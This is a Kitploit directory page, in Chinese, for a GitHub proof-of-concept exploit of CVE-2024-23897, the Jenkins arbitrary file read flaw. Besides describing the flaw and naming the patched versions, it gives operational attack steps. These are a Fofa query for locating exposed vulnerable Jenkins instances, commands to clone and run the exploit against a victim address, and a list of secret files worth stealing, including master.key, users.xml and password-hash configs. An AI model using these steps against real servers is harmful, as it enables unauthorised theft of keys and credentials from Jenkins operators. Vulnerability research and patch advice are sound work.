Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-23897 — POC - Jenkins 文件读取漏洞 - CVE-2024-23897 | Kitploit
工具/GitHubGitHub/verylazytech/cve-2024-23897
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubverylazytech/cve-2024-23897

CVE-2024-23897

POC - Jenkins 文件读取漏洞 - CVE-2024-23897

查看仓库
1071年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

Jenkins 文件读取漏洞 - CVE-2024-23897

My Shop Medium Github Buy Me A Coffee

CVE-2024-23897 是 Jenkins 中的一个严重漏洞,允许未认证攻击者读取 Jenkins 控制器文件系统上的任意文件。该缺陷源于 args4j 库对命令行参数处理不当,特别是在命令行操作中,@ 字符后跟随文件路径可能导致未授权的文件内容泄露。

该漏洞风险极高,攻击者可借此访问敏感信息(如加密密钥和配置文件),进而可能被利用进行远程代码执行(RCE)。鉴于 Jenkins 在 CI/CD 流水线中的广泛使用以及全球范围内大量暴露的 Jenkins 实例,此问题尤为严峻。

修复该漏洞的安全更新已发布在 Jenkins 2.442 及更高版本,以及 Jenkins LTS 2.426.3 及更高版本中。强烈建议用户升级其 Jenkins 安装以缓解此风险并保护敏感信息。

阅读相关详情 — CVE-2024-23897

免责声明:本概念验证(POC)仅用于教育和道德测试目的。未经事先双方同意而使用此工具攻击目标属于违法行为。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不对任何滥用或由此程序造成的损害承担任何责任。

开始使用

寻找目标

要寻找潜在目标,可以使用 Fofa(类似于 Shodan.io):

  • Fofa 搜索语法:header="X-Jenkins: 2.426.2"

受影响的 Jenkins 版本包括最高 2.441 的版本,以及最高 2.426.2 的 Jenkins LTS 版本。

克隆仓库:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-23897

运行漏洞利用程序:

root@kitploit:~
python3 CVE-2024-23897.py -u <Victim_ip:port>

Alt text

在 shell 中输入你想读取的文件路径(本案例为 /etc/passwd): Alt text

一些可能值得关注的文件:

  • /proc/self/environ 环境变量,包括 JENKINS_HOME
  • /proc/self/cmdline 命令行参数
  • /var/jenkins_home/users/users.xml 用户账户存储位置
  • /var/jenkins_home/users/<user_directory>/config.xml 用户 BCrypt 密码哈希
  • /var/jenkins_home/secrets/master.key 加密密钥
  • /etc/hosts Linux 本地 DNS 解析
  • /etc/passwd Linux 用户账户

常规用法:

root@kitploit:~
usage: python3 CVE-2024-23897.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Jenkins URL
  -f FILE, --file FILE  File path to read
  -t TIMEOUT, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p PROXY, --proxy PROXY
                        HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag
下载工具